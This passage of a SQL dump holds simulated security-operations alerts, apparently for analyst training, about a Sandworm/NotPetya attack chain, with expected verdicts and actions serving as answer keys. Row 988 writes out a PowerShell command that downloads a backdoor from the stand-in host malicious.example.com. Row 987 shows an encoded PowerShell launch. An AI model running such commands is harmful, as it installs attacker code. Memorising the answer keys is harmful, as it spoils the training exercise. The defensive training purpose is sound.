operations.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.674Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:56:43Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.10.15\\\",\\\"username\\\":\\\"scada_admin\\\",\\\"detected_malware\\\":\\\"NotPetya\\\",\\\"malware_hash\\\":\\\"71b6a493388e7d0b3c1f0a3b10a9a9cd\\\",\\\"affected_system\\\":\\\"ICS_Controller_01\\\",\\\"action_taken\\\":\\\"Wiper malware executed\\\",\\\"file_path\\\":\\\"/var/log/scada/ICS_Controller_01.log\\\",\\\"event_description\\\":\\\"Destructive malware activity detected on critical infrastructure supporting pharmaceutical operations.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.674Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:56:43Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.10.15\\\",\\\"username\\\":\\\"scada_admin\\\",\\\"detected_malware\\\":\\\"NotPetya\\\",\\\"malware_hash\\\":\\\"71b6a493388e7d0b3c1f0a3b10a9a9cd\\\",\\\"affected_system\\\":\\\"ICS_Controller_01\\\",\\\"action_taken\\\":\\\"Wiper malware executed\\\",\\\"file_path\\\":\\\"/var/log/scada/ICS_Controller_01.log\\\",\\\"event_description\\\":\\\"Destructive malware activity detected on critical infrastructure supporting pharmaceutical operations.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.674Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:56:43Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.10.15\\\",\\\"username\\\":\\\"scada_admin\\\",\\\"detected_malware\\\":\\\"NotPetya\\\",\\\"malware_hash\\\":\\\"71b6a493388e7d0b3c1f0a3b10a9a9cd\\\",\\\"affected_system\\\":\\\"ICS_Controller_01\\\",\\\"action_taken\\\":\\\"Wiper malware executed\\\",\\\"file_path\\\":\\\"/var/log/scada/ICS_Controller_01.log\\\",\\\"event_description\\\":\\\"Destructive malware activity detected on critical infrastructure supporting pharmaceutical operations.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(985, 'Legal Review: Cyber Insurance \'Act of War\' Clause', 'critical', 'Legal Documentation', 'The investigation into the cyber attack revealed the use of sophisticated tactics, including destructive attacks targeting ICS/SCADA systems, reminiscent of Sandworm\'s techniques. The legal battle challenges the insurance \'act of war\' clause, as the attack involved the deployment of wiper malware similar to NotPetya, implicating supply chain vulnerabilities.', 'Legal Analysis', 'T1485: Data Destruction', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T15:23:45Z\",\"event_id\":\"ALERT_007\",\"source_ip\":\"188.166.253.134\",\"destination_ip\":\"192.168.1.15\",\"file_hash\":\"2c1743a391305fbf367df8e4f069f9f9\",\"filename\":\"notpetya_payload.exe\",\"user\":\"jdoe\",\"action\":\"file_execution\",\"description\":\"Detected execution of known wiper malware associated with Sandworm APT on internal ICS network\",\"impact\":\"Destructive impact on critical infrastructure\",\"threat_actor\":\"Sandworm\"}', '2026-01-17 03:41:52', '2026-02-16 17:51:41', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"188.166.253.134\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Sandworm APT\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal ICS network device\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"2c1743a391305fbf367df8e4f069f9f9\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with NotPetya wiper malware\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"notpetya_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable file 
associated with NotPetya\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.675Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T15:23:45Z\\\",\\\"event_id\\\":\\\"ALERT_007\\\",\\\"source_ip\\\":\\\"188.166.253.134\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"file_hash\\\":\\\"2c1743a391305fbf367df8e4f069f9f9\\\",\\\"filename\\\":\\\"notpetya_payload.exe\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_execution\\\",\\\"description\\\":\\\"Detected execution of known wiper malware associated with Sandworm APT on internal ICS network\\\",\\\"impact\\\":\\\"Destructive impact on critical infrastructure\\\",\\\"threat_actor\\\":\\\"Sandworm\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.675Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T15:23:45Z\\\",\\\"event_id\\\":\\\"ALERT_007\\\",\\\"source_ip\\\":\\\"188.166.253.134\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"file_hash\\\":\\\"2c1743a391305fbf367df8e4f069f9f9\\\",\\\"filename\\\":\\\"notpetya_payload.exe\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_execution\\\",\\\"description\\\":\\\"Detected execution of known wiper malware associated with Sandworm APT on internal ICS 
network\\\",\\\"impact\\\":\\\"Destructive impact on critical infrastructure\\\",\\\"threat_actor\\\":\\\"Sandworm\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.675Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T15:23:45Z\\\",\\\"event_id\\\":\\\"ALERT_007\\\",\\\"source_ip\\\":\\\"188.166.253.134\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"file_hash\\\":\\\"2c1743a391305fbf367df8e4f069f9f9\\\",\\\"filename\\\":\\\"notpetya_payload.exe\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_execution\\\",\\\"description\\\":\\\"Detected execution of known wiper malware associated with Sandworm APT on internal ICS network\\\",\\\"impact\\\":\\\"Destructive impact on critical infrastructure\\\",\\\"threat_actor\\\":\\\"Sandworm\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.675Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T15:23:45Z\\\",\\\"event_id\\\":\\\"ALERT_007\\\",\\\"source_ip\\\":\\\"188.166.253.134\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"file_hash\\\":\\\"2c1743a391305fbf367df8e4f069f9f9\\\",\\\"filename\\\":\\\"notpetya_payload.exe\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_execution\\\",\\\"description\\\":\\\"Detected execution of known wiper malware associated with Sandworm APT on internal ICS network\\\",\\\"impact\\\":\\\"Destructive impact on critical infrastructure\\\",\\\"threat_actor\\\":\\\"Sandworm\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.675Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T15:23:45Z\\\",\\\"event_id\\\":\\\"ALERT_007\\\",\\\"source_ip\\\":\\\"188.166.253.134\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"file_hash\\\":\\\"2c1743a391305fbf367df8e4f069f9f9\\\",\\\"filename\\\":\\\"notpetya_payload.exe\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_execution\\\",\\\"description\\\":\\\"Detected execution of known wiper malware associated with Sandworm APT on internal ICS network\\\",\\\"impact\\\":\\\"Destructive impact on critical infrastructure\\\",\\\"threat_actor\\\":\\\"Sandworm\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(986, 'Initial Access via Phishing Email', 'high', 'Email Gateway Logs', 'Sandworm has initiated an attack by sending a spear-phishing email to a TNT Express employee. The objective is to compromise user credentials and gain a foothold in the network. The email contains a malicious attachment that, when opened, attempts to harvest credentials.', 'Phishing', 'T1566.001 - Spearphishing Attachment', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\",\"destination_email\":\"john.doe@tntexpress.com\",\"subject\":\"Urgent: Update Your Account Credentials\",\"attachment\":\"Invoice_Update.docm\",\"attachment_hash\":\"e99a18c428cb38d5f260853678922e03\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"email_headers\":{\"from\":\"admin@secure-accounting.com\",\"to\":\"john.doe@tntexpress.com\",\"subject\":\"Urgent: Update Your Account Credentials\"}}', '2026-01-17 03:41:59', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Sandworm phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal corporate machine.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"john.doe@tntexpress.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Corporate Directory\",\"verdict\":\"internal\",\"details\":\"Valid employee email address.\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"admin@secure-accounting.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"suspicious\",\"details\":\"Domain associated with phishing 
campaigns.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious document used by Sandworm.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access via Phishing Email\",\"date\":\"2026-02-01T20:32:22.676Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(987, 'Execution of NotPetya Payload', 'high', 'Endpoint Detection Logs', 'Upon gaining initial access, the attackers executed the NotPetya payload on compromised systems, causing immediate disruption and data encryption.', 'Malware Execution', 'T1486 - Data Encrypted for Impact', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:35:26Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.56\",\"destination_ip\":\"192.168.1.101\",\"username\":\"compromised_user\",\"process_name\":\"notpetya.exe\",\"process_hash\":\"71f9e4ab8c1c2a4b1a5f9f2e3b7a4c5d\",\"file_path\":\"C:\\\\Windows\\\\Temp\\\\notpetya.exe\",\"action\":\"Executed\",\"severity\":\"High\"}', '2026-01-17 03:41:59', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.56\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with NotPetya distribution.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local network IP.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Logs\",\"verdict\":\"suspicious\",\"details\":\"User account accessed from external IP.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"71f9e4ab8c1c2a4b1a5f9f2e3b7a4c5d\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with NotPetya malware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"notpetya.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Logs\",\"verdict\":\"malicious\",\"details\":\"Filename associated with NotPetya malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(988, 'Establishing Persistence via Backdoor Installation', 'high', 'Network Traffic Analysis', 'During network traffic analysis, an unauthorized communication from an internal host to a known malicious IP was detected. This activity correlates with the installation of a backdoor by the Sandworm threat actor to maintain prolonged access.', 'Backdoor Installation', 'T1059 - Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-09-15T13:45:30Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.5\",\"username\":\"j.doe\",\"process_name\":\"cmd.exe\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -c Invoke-WebRequest -Uri http://malicious.example.com/backdoor.exe -OutFile C:\\\\Users\\\\j.doe\\\\backdoor.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"destination_port\":80,\"protocol\":\"HTTP\",\"malware_name\":\"Sandworm Backdoor\"}', '2026-01-17 03:41:59', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Service\",\"verdict\":\"malicious\",\"details\":\"Associated with Sandworm APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Identified as compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Known hash associated with Sandworm backdoor.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File System\",\"verdict\":\"malicious\",\"details\":\"Detected as unauthorized backdoor 
file.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(989, 'Lateral Movement Across Legacy Systems', 'high', 'Active Directory Logs', 'The attackers exploit weak integration protocols within TNT\'s legacy systems to move laterally, exacerbating the damage and causing widespread operational disruption. The compromised credentials were used to access a legacy system and execute a known malicious binary associated with the Sandworm group.', 'Lateral Movement', 'T1075', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.5\",\"destination_ip\":\"192.168.1.15\",\"username\":\"legacy_admin\",\"logon_type\":3,\"hash\":\"34f7a3113803f8ed3b8fd7ce5656ebec\",\"filename\":\"notpetya.exe\",\"event_description\":\"An account was successfully logged on.\",\"logon_process\":\"NtLmSsp\",\"authentication_package\":\"NTLM\",\"logon_guid\":\"{9e9b9c3a-b8e0-4e0b-8a9d-8c9e3c3a9ceb}\"}', '2026-01-17 03:41:59', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known Sandworm activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal legacy system IP.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"legacy_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"High-privilege account used anomalously.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"34f7a3113803f8ed3b8fd7ce5656ebec\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with NotPetya 
malware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"notpetya.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Filename associated with NotPetya malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Identity\",\"evidence\":{\"user\":{\"username\":\"jdoe\",\"display_name\":\"John Doe\",\"department\":\"Finance\",\"manager\":\"Jane Smith\"},\"risk_score\":85,\"recent_activity\":[{\"action\":\"Login Success\",\"ip\":\"10.0.0.5\",\"location\":\"New York, US\",\"time\":\"09:00 AM\"},{\"action\":\"Password Reset Request\",\"ip\":\"192.168.1.5\",\"location\":\"New York, US\",\"time\":\"09:05 AM\"},{\"action\":\"Login Failed\",\"ip\":\"203.0.113.99\",\"location\":\"Moscow, RU\",\"time\":\"02:00 AM\",\"flag\":true}]}}', 0),
(990, 'Data Exfiltration and Destruction', 'critical', 'File Integrity Monitoring', 'In the final phase, Sandworm attempts to exfiltrate valuable data before unleashing the wiper functionality of NotPetya, leading to permanent data loss and crippling the subsidiary\'s operations.', 'Data Destruction', 'T1485 - Data Destruction', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"event_id\":\"FIM-987654\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.15\",\"user\":\"jdoe\",\"file_path\":\"/var/www/html/backup.sql\",\"action\":\"delete\",\"hash\":\"c1a5298f939e87e8f962a5edfc206918\",\"malware\":\"NotPetya\",\"file_size\":\"45MB\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"severity\":\"Critical\"}', '2026-01-17 03:41:59', '2026-02-16 17:50:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Sandworm APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in the data destruction phase.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"User account possibly compromised during the attack.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"c1a5298f939e87e8f962a5edfc206918\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with NotPetya wiper malware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"/var/www/html/backup.sql\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Integrity 
Logs\",\"verdict\":\"suspicious\",\"details\":\"File marked for deletion during data exfiltration and destruction.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.680Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"FIM-987654\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_path\\\":\\\"/var/www/html/backup.sql\\\",\\\"action\\\":\\\"delete\\\",\\\"hash\\\":\\\"c1a5298f939e87e8f962a5edfc206918\\\",\\\"malware\\\":\\\"NotPetya\\\",\\\"file_size\\\":\\\"45MB\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"severity\\\":\\\"Critical\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.680Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"FIM-987654\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_path\\\":\\\"/var/www/html/backup.sql\\\",\\\"action\\\":\\\"delete\\\",\\\"hash\\\":\\\"c1a5298f939e87e8f962a5edfc206918\\\",\\\"malware\\\":\\\"NotPetya\\\",\\\"file_size\\\":\\\"45MB\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"severity\\\":\\\"Critical\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.680Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"FIM-987654\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_path\\\":\\\"/var/www/html/backup.sql\\\",\\\"action\\\":\\\"delete\\\",\\\"hash\\\":\\\"c1a5298f939e87e8f962a5edfc206918\\\",\\\"malware\\\":\\\"NotPetya\\\",\\\"file_size\\\":\\\"45MB\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"severity\\\":\\\"Critical\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.680Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"FIM-987654\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_path\\\":\\\"/var/www/html/backup.sql\\\",\\\"action\\\":\\\"delete\\\",\\\"hash\\\":\\\"c1a5298f939e87e8f962a5edfc206918\\\",\\\"malware\\\":\\\"NotPetya\\\",\\\"file_size\\\":\\\"45MB\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"severity\\\":\\\"Critical\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.680Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"FIM-987654\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_path\\\":\\\"/var/www/html/backup.sql\\\",\\\"action\\\":\\\"delete\\\",\\\"hash\\\":\\\"c1a5298f939e87e8f962a5edfc206918\\\",\\\"malware\\\":\\\"NotPetya\\\",\\\"file_size\\\":\\\"45MB\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"severity\\\":\\\"Critical\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(991, 'Initial Access via Phishing Email', 'high', 'Email server logs', 'A spear-phishing email was sent to a Ronin employee with the intent to obtain network credentials. The email contained a malicious link leading to a credential harvesting site.', 'Phishing Attack', 'T1566.001', 1, 'Closed', 74, '{\"timestamp\":\"2023-10-05T14:23:11Z\",\"source_ip\":\"185.143.172.101\",\"destination_ip\":\"192.168.1.45\",\"source_email\":\"hr@ronin-security.com\",\"destination_email\":\"john.doe@ronin-security.com\",\"subject\":\"Urgent: Please Review the Attached Document\",\"attachment\":\"ProjectDetails.docx\",\"malicious_link\":\"http://malicious-site.com/login\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36\",\"malware_hash\":\"9c9c1c8a5f1c4e5a6c7e1e8f9f4b3c7d\"}', 